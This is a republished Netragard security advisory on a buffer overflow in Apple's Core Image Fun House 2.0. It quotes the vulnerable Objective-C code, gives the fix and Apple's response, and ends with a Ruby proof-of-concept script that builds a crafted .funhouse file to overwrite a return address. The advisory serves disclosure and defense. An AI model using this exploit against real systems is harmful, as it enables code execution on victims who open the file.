|
|
|
|
| |
| "From creating new solutions for print, photography, scientific visualization, and film post-production to enhancing your application's user interface with innovative and effortless visual effects, Apple's Core Image performs the heavy lifting that enables the next generation of imaging applications." It is possible to trigger an exploitable buffer overflow condition in Apple's Core Image by creating a specially crafted .funhouse file. |
| |
Credit:
The information has been provided by Netragard Security Advisories.
The original article can be found at: http://www.netragard.com/pdfs/research/NETRAGARD-20080630-FUNHOUSE.txt
|
| |
Vulnerable Systems:
* Core Image Fun House version 2.0
Immune Systems:
* Core Image Fun House version 3.1 (xcode tools)
The Funhouse application does not properly parse XML data. Specifically it is possible to create a specially crafted .funhouse file that will trigger and exploit a buffer overflow condition. The code responsible for the condition is as follows:
// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
...
~ NSString *str, *str2, *localizedParameter;
...
~ else if ([type isEqualToString:@"image"])
~ {
~ // image effect stack element
~ // show an image origin (in its center)
~ CGRect r = [[es imageAtIndex:i] extent];
~ NSPoint offset = [es offsetAtIndex:i];
~ pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
~ pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
~ str = [[es filenameAtIndex:i] stringByAppendingString:@" center"];
~ [self drawPoint:pt label:str intoContext:cg];
~ }
}
The following code is called by the code referenced above:
/*
~ Drawing
*/
// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- (void)drawPoint:(NSPoint)pt label:(NSString *)str
intoContext:(CGContextRef)cg
{
...
~ char cstr[256];
...
~ if (!movingNow)
~ {
~ [str getCString:cstr]; <-- Vulnerability Exists Here
Fix:
To fix the issue the [str getCString:cstr]; needs to be replaced with [str getCString:cstr maxLength:254]; to prevent overflows.
- [str getCString:cstr];
+ [str getCString:cstr maxLength:254];
Vendor response:
This issue is addressed in Xcode tools 3.1. Credit to Kevin Finisterre of Netragard for reporting this issue to Apple. Further information is available at: http://support.apple.com/kb/HT1222
Proof Of Concept:
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fname + ".funhouse/file.xml")
File.unlink(fname + ".funhouse/file.xml")
Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")
FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"
target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~ f.print(FUNSTUFF) # weeeeee... lets have fun.
~ f.close
}
|
|
|
|
|
|
|
